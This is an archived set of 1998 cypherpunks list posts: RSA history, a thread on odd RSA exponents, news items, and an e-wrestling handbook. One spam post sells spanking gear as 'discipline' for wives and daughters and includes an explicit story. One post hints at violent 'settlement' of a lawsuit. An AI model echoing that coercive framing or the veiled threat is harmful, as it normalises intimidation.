    Technical Security, and Counterintelligence Site on the Internet.
 =======================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KevB428@aol.com
Date: Wed, 27 May 1998 23:59:06 -0700 (PDT)
To: KevB428@aol.com
Subject: [OWC] Orangemen Wrestling Commision [ handbook v. 1 ]
Message-ID: <30738df8.356d0611@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


===========================
  Kevin Riley Productions Presents
===========================
  /\\         //|
 /               \     \      /          /_____|
 |    ||     |      \/\/         //
 |    |___|     |                   /  \
 \               /\        _       /     |
  \_______/   \___/  \___/ \_______|
===========================
 Orangmen Wrestling Commission
===========================
 Frequently Asked Questions v.1.0
===========================

==================
Table of Contents
   A. Foreward
   B. Cards & Titles
   C. Rules
   D. Roleplaying Tips
   E. Application
   F. Staff

==================

==================
A. Foreward
==================

            Hello folks, I'm Kevin Riley, and I'm making my _last_ attempt at
making a federation great.   This is make-it or break-it time for me, and I
really am determined
to bring this federation into the bigtime.

            The OWC stands for Orangemen Wrestling Commision, which is a
regional federation (similiar to MVW, and also a friend of that fed) that is
run out of none other
than Syracuse, New York.   It will not be having cards in Madision Square
Garden, as it will start off slow, like most independants, and hopefully work
its way up.   This fed
will actually start off holding their cards in a local nightclub in Syracuse
that we all
know as the Rave, which seats about three hundred people.

            This federation will be run by Carson Bordon, the current OWC
President.
He and Riley got a huge loan from a bank in Albany, New York, and now have
made
their last attempt at making a major federation.  The recruiting has started,
and calls
have been made, contracts sent.   So, are you ready to join the OWC and face
some of the toughest, and newest competition that you've ever seen?  If so,
welcome!

==================
B. Cards & Titles
==================

The New York State Heavyweight Championship - This is definitly the big one.
The top dawg will be the man holding this title and it will definitly be a
title that a lot of
people will be contender for.   This title shall be defended every two weeks.

The Syracuse Heavyweight Championship - This is the secondary title, and we'll
also be heavily competed for.  This is for the people not quite ready to make
it onto the
world title scene yet.   This title will also be defended once every two
weeks.

Warriors of Syracuse Wrestling - This is the card that will be held once a
week, on
Sunday nights.   There should be around three to four matches on each card and
as the fed expands, the amount of matches will as well.  There will also be
interviews,
special appearances, and everything that you'd come to expect from a normal
wrestling television show!  It will take place in the Rave, a local Syracuse
night club that holds up to three hundred people total.

The first card will be presented to you on the twenty first of June.  It will
feature more matches than the normal card, and will attempt to get _every_
single wrestler in the
federation, somehow participating in a match or something of some sort.  It
will be a sort of supercard, but will be on Sunday, and called, the Warriors
of Syracuse wrestling, like the normal weekly show.

==================
C. Rules
==================

I will accept a maxium of two roleplays a week and one in-ring.   To start the
OWC off, we'll be going with the one card a week format, if we get pushed to
two cards a
week, then it will be two in-rings, one for each card.  Please be reminded,
that this
plan of roleplays is tentative, and could be changed.

Strats will play a huge role in setting up angles, and will also count towards
your matches and my decisions as to who wins or not.

Some wrestlers, specifically heels, are particulary good at drawing heat, and
getting
themselves known quicker than others.  That will also help out your chances.

This is a perfect time to repeat that phrase that we all know, quality not
quantity!


==================
D. Roleplaying Tips
==================

* Content

     The content of one's roleplay is not the length the roleplay but the one
or many message(s) that the roleplay gets across in that length.  Content is
by far the most important part of a roleplay, and must be looked upon as
essential.  A roleplay without any content is just jabber and jargon thrown
into a file.  You must always have some sort of content in your roleplays.
     When you begin a roleplay, you must set a goal for amount of content you
want to cover during the course of your OWC roleplay.  Tell yourself what, in
a brief rundown, that you want to tell everybody in this roleplay of yours.
If you want to tell the whole OWC that you are here to stay and to pledge your
allegiance to the OWC, then remember that fact while you are writing your
roleplay.  Never write a roleplay with out any topics to write about.
     If you want to know if your roleplay has any content, then read it over
and ask yourself what the message you got across was.  If you can't answer
that question in a breif sentance or two, then the chances are, you have no
body and content to your roleplay and you need to start over and try again.
     The more topics you have to discuss, the better.  You can never have
enough content.  If you have enough topics to write 5 pages or so, then so be
it and go though with it.  Also, you should learn to elaborate on your topics
and make them into a 'big deal'.  If your topic is "I want to challenge Klonis
to a match" then ask yourself all the possible questions to stimulate ideas!
Ask yourself why you want to wrestle Klonis.  Ask yourself how good of a
chance you have at defeating Klonis.  Ask yourself what type of match you want
to challenge Klonis to.  Ask youself when you want to wrestle Klonis!  The
possibilities are endless, people!  Cover every area and aspect you can!
     Sometimes when I'm going to write a roleplay, it helps me to make a breif
listing of the different things I want to cover during the course of the
roleplay in chronological order.  I then procede to turn the breif sentances
into dialouge and description and under normal circumstances I come out with a
somewhat decent roleplay that has both a point and a decent amount of
reasoning behind it.  It makes sense, people.
     The main thing you have to remember, though, when writing your roleplay
... is that you must develop your character.  Get a good idea of what your
character's all about by re-reading your application to the OWC, and then put
that all across in the roleplay.  If you're wrestler is a happy goofball, then
play him as a happy goofball and don't have him take matches or wins and
losses too seriuosly.  If you wrestler is a hard-nosed technical wrestler
obsessed with winning, then have him take things seriously and be quite angry
when he loses.  It's all about character development and if you don't have any
idea how your character should act, then it's probably time to create a new
one.

* Length

     Length certainly isn't the most important part of your roleplay, but it
is something that you must seriously consider if you're a newbie.  You're
roleplay MUST be at least a k or two to get anything across, in my opinion.
Although it is hard to find the happy medium between too long and too short,
you'll get there if you follow these steps!
     First of all, don't wear your topic down so much that nobody is going to
be interested in reading it anymore.  Cover what you need but don't exasperate
the subject.  Nobody wants to read a roleplay that's 20k and has no plot!
Once you stop having fun writing your roleplay it's probably finished.
     But also, you must not send in a roleplay that is 3 lines long or even a
paragraph long.  In the OWC, everytime you send in a roleplay that is 5 or
less lines, that's pretty much an automatic loss.  Make your roleplay to the
point but long enough so it'll take a few minutes to read and leave the reader
with a good taste in their mouth and a good idea what your character is about.
Touch base with the subject quite a bit and make it long enough.

* Detail

     The next thing that you newbies must learn is that you must always create
a beginning and a conclusion in your roleplays!  At the beginning of your
roleplay, you must _always_ give a breif description of your wrestler's
setting and describe that wrestler.  A setting description tells the who,
what, where, when and why of the roleplay.  A beginning is also put inside
action bars which are () or [] or :: :: or {}.  In a beginning, you should
describe what the character is wearing, what his mood is like, where his is,
what he's doing there, ect.  For example, read the next paragraph which is one
of my less recent descriptions and was written when I was a newbie to e-
wrestling.  Most should be about this length and decency.  Maybe better.
     [The screen fades in to Klonis.  He's sitting in a dark living room
rocking back and forth on an easychair.  He's wearing his street clothes which
consist of a pair of faded denimn jeans, a black tank top, and a nike
headband.  His black hair is slicked back and his eyes are squinted and
feirce.  The only illumination in the room is cast by a fireplace with the
embers slowly dying out.  The cameraman gives him a closup as signals to come
over to him.]
     Also, you must remember to add a conclusion.  The conclusion is more of
the same except it would say things like, Klonis is fading out, ect.  Be
careful not to make these too drab.  It can get tricky to think up the setting
some times.  <hint: the setting could have something to do with the content.>
     Another thing, is that you must watch the spelling in your roleplay and
try to word things as efficiently and as nicely as possible.  Go through the
document numerous times to make sure you did not make any foolish spelling
mistakes, make sure you add two spaces after a period, you inserted commas
where needed, you did not have any fragments or run-ons.  Don't make yourself
look foolish by saying stuff like this:
     (Wrtler): "im cmin to getg you cuz of what you ded to me that tyme when u
did dat thing.."

==================
E. Application
==================

IMPORTANT NOTE:  This federation is taking a new approach.  We will prefer
that you all bring in _new_ characters that you've never before used.  That
way reputations and egos will not be as much of a problem.  This is not
mandatory, but I prefer it.

 * Your Name: (optional)
 * Your Age: (optional)
 * Your E-Mail Address:
 * Your IRC Nickname:

 * Wrestler's Name:
 * Age:
 * Hometown:
 * Hair Color:
 * Eye Color:

 * Height: (between 5'5" - 7'0")
 * Weight: (between 200 - 500)
 * Build: (stocky, muscular, trim, ect.)

 * Manager or Valet's Name: (optional)
 * Describe Manager or Valet: (optional)

 * Please describe your wrestler's ring style:  (anything from technician to
lucha to powerful, ect.)

 * Please describe your wrestler's gimmick/attitude/personality as much
  as you can:

 * Please give us a little background on your wrestler (perhaps a made-up
  history-- we just want to get a good idea of who your character is):

 * Entrance Music (please use an actual song, I don't want to see "The
  Giant's WCW Music"):

 * Describe your wrestler's entrance to the ring (does he have fireworks,
  special lights, anything he does before he gets to the ring... if you
  are creating a tag team, skip this category and fill out Tag Team
  Entrance on the Tag Team sheet instead):

 * Describe your wrestler's physical appearance (please be as descriptive
  as possible!):

 * Describe your wrestler's ring attire (again, please be descriptive!):

 * Taunts (does your wrestler do any taunts or celebrations to his opponent
during the course of the matchup?  If so, mark his celebrations here!)

 * What is the name of your wrestler's finisher?
 * What is the real name of the move?

 * List 10 - 15 moves your wrestler performs:

==================
F. Staff
==================

Fictional Staff:

PRESIDENT - Carson Bordon
HEEL COMMENTATOR - Max Femmia
FACE COMMENTATOR - Nathan Liotta
RING ANNOUNCER - Michael Morgan
SENIOR REFEREE - Christopher Burk
TIMEKEEPER - Otto Jeckel
CHEIF OF SECURITY - Robert O'Connor

Staff:

PRESIDENT - Kevin Riley
ASSISTANT BOOKER - Rick Baptist (Also a promoter, recruiter, pay per view
writer.)
CARD MATCH WRITER - Paul Clark
CARD MATCH WRITER - ????????
CARD MATCH WRITER - ????????
PAY PER VIEW WRITER -  Rick Baptist
PAY PER VIEW WRITER -  Jay Ralston
PAY PER VIEW WRITER -  Andru Edwards
PAY PER VIEW WRITER -  Thomas Smith
PAY PER VIEW WRITER -  Adam Graves
ASSISTANT -  Anthony Brigano  (promoter, recruiter, and will keep rankings for
the wrestlers and annals, which is a list of results for every card)

[NOTE:  If you can help in any of these spots, _please_ tell me.  To keep this
federation great, I'm going to need all the help I can get, this is _very_
important.]

=============================
Special thanks to Anthony Brigano for
helping me make this handbook, and
helping make the macros, and well,
helping recruiting!
=============================
OWC, Orangemen Wrestling Commission
Max Femmia, Nathan Liotta, Carson Bordon
and all related names, characters and their
likenesses are copyright and trademark
Kevin Riley Productions (KRP) 1998.
=============================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: one4evil@juno.com (Nalus Optic)
Date: Thu, 28 May 1998 16:10:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Lack of net access blows:
Message-ID: <19980528.071047.4222.8.one4evil@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Cyberpunks,
	
	Que pasa?  My name is D and I am new to the list...I will most
likely just be lurking for a while, till I get a visit from the Duel
Pentium II 266, 128megs of RAM, running Linux on one PII and Win98 on the
Other Fariy...She should be along by the end of the summer...

	Anywhoo, the point of the subject is that at this point and time
I don't have net access so I was hopeing someone out there would send me
the FAQ that is talked of in the welcome message.  It can be found at:

	anonymous ftp to rtfm.mit.edu:pub/usenet-by-group/sci.crypt

	At least I think that is where it is at...

	I thank who ever is nice enough to send it to me...Also, maybe
post a message to me as soon as you send it...That way I don't end up
with like all of you sending it and Juno kicking my ass again for
flooding there box.


			TNX,

			D.

_____________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 28 May 1998 05:14:00 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Public Key Royalties
Message-ID: <199805281213.IAA04745@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


[Forward]

:
:
:
Date: Thu, 28 May 1998 03:17:16 -0400
To: John Young <jya@pipeline.com>
From: Vin McLellan <vin@shore.net>
Subject: Public Key Royalties

Hi John:

	You recently posted a note from a 5/7/98 GAO report[*] on federal
(Bayh-Dole Act) funding for US research universities in which documented
MIT's 1996 revenues from the commercialization of public key crypto. In an
accompanying note, you raised a few questions about the historical
background of PKC that I thought a deserved response.

	The politics of crypto in the US is burdened with enough shadowy
plots that it behooves those of us who try to track the history of the
industry to keep a grip on simple historical fact whenever we can.

	I personally think the key figures involved in the discovery of PKC
-- certainly Whit Diffie, Martin Hellman, Ron Rivest and Len Adleman --
have for years been exemplary role-models of personal and intellectual
discipline, professional openness, and forthright political engagment (in
the best sense of the word). I wouldn't like to see the public's
understanding of their contributions lost beneath another layer of
Byzantine conspiracy theories.

	You wrote:

>In a recent GAO report on governmental funding of university research
>there is this note:
>
>   In fiscal year 1996, the commercialization of the public key encryption
>   method, which was developed under grants from the Navy and NSF,
>   resulted in $271,875 in royalties to MIT.
>
>Does this refer to RSA or PGP? Did the Navy underwrite RSA's PK work?
>If so does the USG have a secret stake in PGP, Network Associates
>and RSA?
>
>More: did the Navy guide PK researchers based on the secret UK PK work
>before Diffie-Hellman?

	Quick answers to your first questions:

	(1) RSA. RSA Data Security Inc.(RSADSI), a company started by the
three inventors of the RSA cryptosystem was given a contract by MIT to
commercialize the RSA cryptosystem. Under the terms of that contract,
RSADSI pays royalties to MIT, which still owns the RSA patent.

	(2) Nope. The Office of Naval Research (ONI) did staff the
"contracting office" responsible for administering DARPA funding for the
MIT labs where Rivest, Shamir, and Adleman did their initial work -- but
neither the Navy, nor DARPA, nor the NSA, nor the CIA, nor the Feebees
supported the subsequent development of public key cryptography at RSADSI
(the company started by the three inventors which was subsequently given an
exclusive contract by MIT to commercialize the RSA algorithm.)

	(3) No secret stake in RSADSI -- so say the sworn documents filed
with the SEC before the 1996 merger of RSADSI and SDTI. PGP was not
developed at MIT. PGP has never paid royalties to MIT. I don't actually
know if there is, or ever was, any relationship or federal "stake" in PGP
Inc. or Network Associates Inc., but I doubt it. (I also think your
suggestion, without evidence, is a fairly gratuitous slander against all
these firms -- given the historic interest of US government agencies in
weakening non-government crypto and/or forcing independent cryptographic
vendors to corrupt their designs with backdoors to allow surreptitous

government access to encrypted messages and files.)

	As you may recall, I do a lot of consulting for Security Dynamics
(SDTI), which purchased RSADSI in 1996.  I sent your questions over to Ron
Rivest, and he asked me to pass along his response:

>The work on RSA at MIT was supported by NSF grant MCS76-14294 and ONR
>(Office of Naval Research) grant N00014-67-A-0204-0063. (See the
>footnote on the original RSA paper.)  I note that the ONR is the
>contracting office for a DARPA grant here; the "Navy" as such was not
>involved.
>
>(The grants listed above did not even specify cryptography in their
>proposals, and it was more of a courtesy than anything else to
>acknowledge their support on the RSA paper, since they were supporting
>other research in algorithms and such.)
>
>As a consequence of this support, the U.S. government does not have to
>pay royalties on the "RSA patent" (U.S. patent 4,405,829.)  This is a
>standard arrangement for government-supported research; the government
>doesn't want to have to pay twice for the work.
>
>There is no "secret stake" by the government in RSA.  The royalty-free
>license of the patent is their only involvement.
>
>There was no contact, influence, or involvement from any government
>source regarding our development of RSA.  Assuming (correctly, I
>believe) that the Diffe-Hellman paper (New Directions in Cryptography)
>was developed independently of any similar developments in the U.K.,
>then the academic development of the concept of public-key, and our
>consequent development of RSA, were totally independent of whatever
>developments happened earlier in the U.K.
>
>Indeed, given the reaction from the government that we've seen ever
>since, trying to control and/or suppress public-key technology, it is
>extremely bizarre to conjecture that the government in any way
>encouraged it early on or gave technical advice based on work in the U.K.

	I suggest anyone interested in the work on "dual key" cryptography
by British government cryptographers in the early 1970s will want to read
Jame Ellis' fascinating paper, published last December by the British
government, at: http://www.cesg.gov.uk/ellisint.htm  There was also a brief
but helpful NYT article by Peter Wayner, available at:
http://www.nytimes.com/library/cyber/week/122497encrypt.html

	There have doubtless been numerous breakthroughs and great
inventions in the shadowy world of government cryptography. Unfortunately,
the hostility of this (and most governments) have shown toward allowing
such privacy-enabling technologies to fall into the hands of mere citizens
will probably mean that we will have to wait for those inventions to be
rediscovered and thus made available to the free world by others.

	I think we were all lucky that public key crypto -- the necessary
foundation for on-line electronic commerce, which in turn is seen by many
as potentially the economic engine for 21st Century -- was discovered, or
rediscovered, by mere citizens who looked first to its personal and
commercial implications.

	I don't think there was a chance in hell that GCHQ, or the NSA
(which also claims to have separately discovered PKC ten years before

Hellman and Diffie conceived of it) could have recognized its personal or
commercial potential... or would have allowed it to come into the
widespread use we see today if, perchance, they _had_ foreseen that
potential.

	Please feel free to post this. Thanks again for all your work
collecting the treasure trove of documents you have at jya.com.  It's an
invaluable resource.

	Surete,

		_Vin

-----
"Cryptography is like literacy in the Dark Ages. Infinitely potent, for
good and ill... yet basically an intellectual construct, an idea, which by
its nature will resist efforts to restrict it to bureaucrats and others who
deem only themselves worthy of such Privilege."
_ A thinking man's Creed for Crypto/ vbm.

*     Vin McLellan + The Privacy Guild + <vin@shore.net>    *
  53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548

[End Forward]

* See report: http://jya.com/rced-98-126.txt  (184K)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: glowing@americanteleport.com
Date: Thu, 28 May 1998 13:25:39 -0700 (PDT)
To: glowing@americanteleport.com
Subject: HOW DO YOU HANDLE AN ERRANT WIFE?
Message-ID: <00caa5558121c58MAIL@americanteleport.com>
MIME-Version: 1.0
Content-Type: text/plain


....................................................................................................................
Your address was gathered from a detailed search. This is not spam and we are sorry for any inconveinence. If you wish to be removed from this advertiser's future mailings, please reply 
with the subject "Remove" and our software will automatically block you 
from their future mailings.
....................................................................................................................

SPANKING, OTK, PADDLING, SWITCHING ?? HOW DO YOU HANDLE AN ERRANT WIFE,
GIRLFRIEND, DAUGHTER, OTHER (OK MOTHER). WANT TO DISPENSE TRUE DISCIPLINE OR JUST HAVE SOME FUN? WATCH A VIDEOTAPE OR REALLY USE A TOY OF YOUR CHOICE?
PUT SOMEONE IN THEIR PLACE...FOR GOOD?

WE HAVE THE TOYS,
( http://www.glowingresults.com/glowingresults/paddles/index.htm )

THE TOOLS,
( http://www.glowingresults.com/glowingresults/restraints/index.htm )

AND WE CAN SHOW YOU HOW IT'S DONE
( http://www.glowingresults.com/glowingresults/videos/index.htm) ...

          REAL SPANKING/PADDLING ACTION VIDEOTAPES

               NO 'FLUFF....THE REAL STUFF !!
___________________________________________________________________
This is a sample of just a story !!

Our Videotapes Show Real Punishment of Actual Adults !!

WARNING!!
This story contains details of the real punishment of an adult. 
M/F, O.T.K. ,  SPANKING and PADDLING, NUDITY, and KINKY SEX.
If you are offended by this type of material please do not open this
object!! If you are not then please enjoy it !!  We try to please !!

http://www.glowing-results.com
___________________________________________________________________

"So, what are you gonna do...spank me?"

The poor salesgirl blushed a deep red as those words came flying out of
Lindas' mouth. I looked at her for a moment then said, "That's exactly what
you need young lady, something to adjust this attitude of yours!" Linda
flushed slightly at this announcement (she always does right before) gave me
a nasty look and began to turn away, I grabbed the sleve of her coat to stop
her. As I pulled her around to face me the 'look' became her pout, there was
little resistance as I propelled her towards the door of the shop. "Keep
that gift there," I said to the clerk, "we'll be back in a few minutes."

We had talked about a semi-public spanking for her, when a few others knew
what would happen to her. There was also the prospect of an accidental
audience. 

7 PM, the parking lot was dimly lit, there were a lot of cars and I had
parked close to the center of the lot. It was a chilly night but about to
'warm-up' for Linda!  Her heels made a sharp 'click' 'click' as we walked
across the cold pavement.
"Shit...I have to go back in there and face her...don't I?"
"Yes, that's the idea, tears, sore bottom and all!"
"Oh shit...does it have to be too...hard?"
"You know the idea, red face, red ass, as hard as I can spank in the back seat."
"Just your hand...only a spanking...nothing else?"
"No, not my hand at all. I brought that little clear paddle that we bought
from 'Glowing Results' just for tonight, I wanted to make sure that there
were tears. Remember how much that stings?"

We arrived at the car, I directed her to the passengers side rear door.
After a fast look around at the other vehicles I turned Linda to face me,
shook my finger in front of her nose and said, "Get in the back seat young
lady, you've earned this one!" The pout was still there as she turned and
entered the back door, I closed it firmly. Sliding in on the drivers side, I
turned to face Linda.

Mother was about to get a REAL spanking!!

____________________________________________________________________







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 28 May 1998 06:27:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: USG to Sue Other Wintel
Message-ID: <199805281327.JAA06789@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


New York Times reports today that the FTC is shortly
to file a major anti-trust suit against Intel, "charging
the company with abusing its position as the dominant
manufacturer of mircoprocessor chips."

   http://www.nytimes.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Beattie, Doug" <Doug.Beattie@GSC.GTE.Com>
Date: Thu, 28 May 1998 06:59:56 -0700 (PDT)
To: Luis Saiz <LSaiz@atos-ods.com>
Subject: RE: The exponent of the RSA public key must be odd.??
Message-ID: <8D3B7E46799CCF118D9D00805FE28A1E03E6AB09@ndhm06.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain



The exponent must be relatively prime to (p-1)(q-1) where p and q are prime
numbers.

Doug

On Thursday, May 28, 1998 4:14 AM, Luis Saiz [SMTP:LSaiz@atos-ods.com]
wrote:
> OS/390 Integrated Cryptographic Service Facility Application
> Programmer's Guide Version 2 Release 5 Publication No. SC23-3976-02
> :
>  http://ppdbooks.pok.ibm.com:80/cgi-
>  bin/bookmgr/bookmgr.cmd/DOCNUM/SC23-3976/CCONTENTS
> 
> 
> 
> In several parts of the document it's specified that, as a
> restriction:
> 
> 
> > The exponent of the RSA public key must be odd.
> >
> It's there any (unknown to me) security reason to be this way, or
> its
> an implementation/standard option??
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Luis Saiz <LSaiz@atos-ods.com>
Date: Thu, 28 May 1998 01:21:02 -0700 (PDT)
To: cypherpunks <cryptography@c2.net>
Subject: The exponent of the RSA public key must be odd.??
Message-ID: <356D1CA8.C39ABB94@atos-ods.com>
MIME-Version: 1.0
Content-Type: text/plain


OS/390 Integrated Cryptographic Service Facility Application
Programmer's Guide Version 2 Release 5 Publication No. SC23-3976-02 :
 http://ppdbooks.pok.ibm.com:80/cgi-bin/bookmgr/bookmgr.cmd/DOCNUM/SC23-3976/CCONTENTS



In several parts of the document it's specified that, as a restriction:


> The exponent of the RSA public key must be odd.
>
It's there any (unknown to me) security reason to be this way, or its
an implementation/standard option??







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Thu, 28 May 1998 07:41:57 -0700 (PDT)
To: Luis Saiz <LSaiz@atos-ods.com>
Subject: Re: The exponent of the RSA public key must be odd.??
In-Reply-To: <356D1CA8.C39ABB94@atos-ods.com>
Message-ID: <356D7682.D989D46B@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


How many prime numbers do you know of that are even?

Luis Saiz wrote:
> 
> OS/390 Integrated Cryptographic Service Facility Application
> Programmer's Guide Version 2 Release 5 Publication No. SC23-3976-02 :
>  http://ppdbooks.pok.ibm.com:80/cgi-bin/bookmgr/bookmgr.cmd/DOCNUM/SC23-3976/CCONTENTS
> 
> In several parts of the document it's specified that, as a restriction:
> 
> > The exponent of the RSA public key must be odd.
> >
> It's there any (unknown to me) security reason to be this way, or its
> an implementation/standard option??

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Thu, 28 May 1998 12:41:06 -0700 (PDT)
To: ukcrypto@maillist.ox.ac.uk
Subject: Payne v. NSA: Plaintiff's Motion and Objection
Message-ID: <356DBB9A.44E8@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young

Just saw

whp052898.htm      Payne v. NSA: Plaintiff's Motion and Objection    May
28, 1998

at http://www.jya.com/crypto.htm

THANK YOU SO MUCH.

And for

  http://www.mckennacuneo.com/practice/Quitam/QU02519960901.html

too!	

We need visibility to get this HORRIBLE MESS SETTLED. PEACEFULLY!

There are other ways of settling matters.  

Aggrieved Shiite Muslims have a fair record at other means of settlement

  http://www.netlink.co.uk/users/impact/namir/martyrs.htm#allvictims

I want to get this settled and revise my book for the 80c52. 

 
http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2

and maybe do something more with shift registers too 

  http://av.yahoo.com/bin/query?p=gfsr&hc=0&hs=

Best
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Thu, 28 May 1998 12:40:04 -0700 (PDT)
To: Luis Saiz <LSaiz@atos-ods.com>
Subject: Re: The exponent of the RSA public key must be odd.??
In-Reply-To: <356D88D7.1D480241@atos-ods.com>
Message-ID: <Pine.SUN.3.91.980528142154.15208A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 May 1998, Luis Saiz wrote:

> OK, I've never realized that e and d must both be co-prime with respect to (p-1)(q-1), 
> only that ed=1 mod((p-1)(q-1)), and I didn't saw the implication.

	Actually, that the exponent must be odd is much more immediate:

	If ed = 1 mod(p-1)(q-1), then
	   ed = 1 + multiple*(p-1)(q-1)
	      = 1 + multiple*(even #)
	      = 1 + even # = odd #.

	If either e or d were even, this couldn't be true.

							-Xcott

	[This same argument, by the way, is how you prove that 
	 e and d must both be co-prime to phi(n).  Just let 
	 C be any divisor of phi(n), and replace "even" with
	 "divisible by C" and "odd" with "not divisible by C"]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 62627874@19214.com
Date: Thu, 28 May 1998 17:39:35 -0700 (PDT)
To: success@nowhere.com
Subject: No Subject
Message-ID: <199702170025.GAA08056@nowhere.com>
MIME-Version: 1.0
Content-Type: text/plain


Phonenumbers all over the world www.PhoneNumbers.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Thu, 28 May 1998 14:09:20 -0700 (PDT)
To: kalliste@aci.net>
Subject: Mrs [Delicate Touch] Hanks
Message-ID: <356DD1B6.771F@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Thursday 5/28/98 2:48 PM

John Young
J Orlin Grabbe

On return from my walk this afternoon, I spoke with
Mrs [Delicate Touch] Hanks

http://207.33.92.15/art/va/artworkSearch.html$search
http://www.eslawrence.com/Hankspage.htm
http://www.artcorner.com/
http://www.sea-art.com/hadleyhouse/hanks/index.cfm
http://www.eslawrence.com/hankprint.htm
http://www.birchgrove.com/artists/steve%20hanks.htm
http://www.artsource1.com/hanks.html
http://www.nice-things.com/hanks.html

who lives just down the street from us.

I asked her if the large edition being built on top of the
previous single-story home was going to be a studio.

She responded in American.  "Yah"

Occasionally I see some REALLY GOOD LOOKING women outside Hanks' home.

We REALLY should get this UNFORTUNATE MATTER settled before it gets
WORSE.

And it looks like it is getting WORSE.  http://www.jya.com/whp052898.htm

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 28 May 1998 12:51:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Asymmetric Warfare
Message-ID: <199805281951.PAA25901@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 27 May 1998 15:34:10 -0500
From: "90. USAFnews" <usafnews@AFNEWS.AF.MIL>

980734.  Special operations commander outlines future threats
by Capt. John Paradis
16th Special Operations Wing Public Affairs

HURLBURT FIELD, Fla. (AFNS) -- More Chechnyas.  If a military strategist
needed to look at a good model for the typical future conflict, the war
torn republic of Chechnya comes to mind, said Gen. Peter J. Schoomaker,
U.S. Special Operations Command commander in chief.

Speaking recently to about 2,000 Hurlburt Field troops at the 55th
Aircraft Maintenance Unit hangar, Schoomaker said the only certainty in
the future of warfare is that security challenges will be more ambiguous
and will follow less traditional paths.

Looking at Chechnya as an example of future conflict, confrontation will
likely differ from the more conventional and familiar "total war" by the
inclination of future adversaries to use "psychological terror" and the
influence of international media, the Internet and even cell phones to
employ open brutality as an information warfare tactic.

Russian President Boris Yeltsin, determined to crush the secessionist
drive of the tiny, mainly Muslim southern republic, ordered about 40,000
troops into Chechnya in December 1994.  What was planned as a quick
campaign turned into a long and costly war, in which the outnumbered
rebels time and again dealt heavy blows to a demoralized Russian
military.

It's such "asymmetric" opponents like separatists, rebel groups,
insurgents and terrorists that U.S. special operations forces will need
to prepare for -- enemies who won't attack U.S. strategic strengths, but
will instead target U.S. vulnerabilities by executing unorthodox
measures to gain success, Schoomaker said.

"That's the future.  More Chechnyas," the general said.   "We are going
to see more conflict of this nature because it's a much different world
we're facing."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Luis Saiz <LSaiz@atos-ods.com>
Date: Thu, 28 May 1998 08:55:03 -0700 (PDT)
To: Sunder <cryptography@c2.net>
Subject: Re: The exponent of the RSA public key must be odd.??
In-Reply-To: <356D1CA8.C39ABB94@atos-ods.com>
Message-ID: <356D88D7.1D480241@atos-ods.com>
MIME-Version: 1.0
Content-Type: text/plain




Sunder wrote:

> How many prime numbers do you know of that are even?
>

One: 2  ;-)

OK, I've never realized that e and d must both be co-prime with respect to (p-1)(q-1), only
that ed=1 mod((p-1)(q-1)), and I didn't saw the implication.

Sorry for this stupid question, next time I'll do more mathematics before.


> Luis Saiz wrote:
> >
> > OS/390 Integrated Cryptographic Service Facility Application
> > Programmer's Guide Version 2 Release 5 Publication No. SC23-3976-02 :
> >  http://ppdbooks.pok.ibm.com:80/cgi-bin/bookmgr/bookmgr.cmd/DOCNUM/SC23-3976/CCONTENTS
> >
> > In several parts of the document it's specified that, as a restriction:
> >
> > > The exponent of the RSA public key must be odd.
> > >
> > It's there any (unknown to me) security reason to be this way, or its
> > an implementation/standard option??
>
> --
>
> =====================================Kaos=Keraunos=Kybernetos==============
> .+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
> ..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
> <--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
> ../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
